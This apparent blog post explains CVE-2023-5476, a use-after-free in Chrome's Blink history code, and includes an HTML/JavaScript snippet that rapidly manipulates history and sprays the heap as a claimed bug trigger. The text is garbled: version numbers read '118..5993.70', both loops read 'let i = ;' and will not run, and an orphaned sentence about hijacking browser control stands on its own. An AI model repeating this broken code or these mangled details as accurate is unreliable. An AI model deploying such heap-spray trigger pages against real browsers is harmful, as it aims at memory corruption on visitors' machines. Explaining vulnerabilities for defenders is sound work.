CVE-2023-5476 - Exploiting a Use-After-Free in Google Chrome's Blink History

CVE-2023-5476 is a medium-severity vulnerability found in Google Chrome’s Blink rendering engine, specifically in the history handling component. This flaw affects Chrome versions prior to 118..5993.70 and could let an attacker execute code or corrupt the heap memory simply by tricking a user into visiting a specially crafted webpage.

This post will break down what a "use-after-free" vulnerability is, how this bug works in Chrome's Blink History, show example code, and walk through a generic exploit scenario.

What is a Use-After-Free?

A use-after-free (UAF) bug happens when an application keeps using a chunk of memory after it's been freed (returned) back to the system. If an attacker can control what happens in that freed memory region, they could make the program behave in weird ways — like crashing, reading sensitive data, or even running malicious code.

How Does the Vulnerability Work?

Basically, this bug lives inside how Chrome’s engine manages the navigation history of a tab or window. When JavaScript or browser actions make the browser "go back" or history is manipulated rapidly, it could happen that Blink drops (frees) history objects... but still uses them right afterward. If a malicious page is crafted to trigger this, the browser could use memory that's no longer safe — opening it up to attacks.

Example Exploit Scenario

Suppose a malicious page quickly and repeatedly changes the browser history (like adding/removing entries), uses JavaScript to manipulate pages, and triggers the browser’s undo/redo navigation in a way that confuses Blink. This can lead to use-after-free — where the freed history object is controlled by the attacker.

Code Snippet Demonstration

*Below is a simple code snippet that showcases rapid history manipulation — not a working exploit, but how the bug could be triggered:*

<!DOCTYPE html>
<html>
<head>
  <title>History UAF Trigger</title>
  <script>
    function sprayHeap() {
      // Fills heap with data to increase chance of exploit
      let heapFiller = [];
      for (let i = ; i < 10000; i++) {
        heapFiller.push(new Array(10000).fill('A'));
      }
    }

    function triggerUAF() {
      for (let i = ; i < 100; i++) {
        // Rapidly manipulate history state
        history.pushState({page: i}, "title" + i, "?page=" + i);
        history.back();
        history.forward();
      }
      sprayHeap();
    }

    window.onload = function() {
      setTimeout(triggerUAF, 150);
    }
  </script>
</head>
<body>
  <h1>Chrome Blink History Use-After-Free</h1>
</body>
</html>

*Note: This code just shows the idea and does not exploit the vulnerability.*

Hijacking browser control (by corrupting an object or function pointer).

On 64-bit systems with security measures like sandboxing, DEP, and ASLR, actual exploitation needs advanced techniques and in-depth Chrome engine knowledge.

Patched and Safe Versions

Google fixed this vulnerability in Chrome 118..5993.70 and later. To stay safe, make sure you update your browser!

References

- Google Chrome Release Notes (Oct 2023)
- Chromium Bug Tracker (Restricted)
- CVE Entry at NIST

Conclusion

CVE-2023-5476 is a reminder of how complex browsers are, and how small mistakes in memory management can lead to major security risks. Always keep your browser up to date and be careful with unknown websites. If you’re a developer, avoid rolling your own browser engine code unless you know a *lot* about memory safety!

Stay safe — update Chrome regularly.

*Feel free to share this post if you found it helpful!*

Timeline

Published on: 10/11/2023 23:15:10 UTC
Last modified on: 10/20/2023 20:19:10 UTC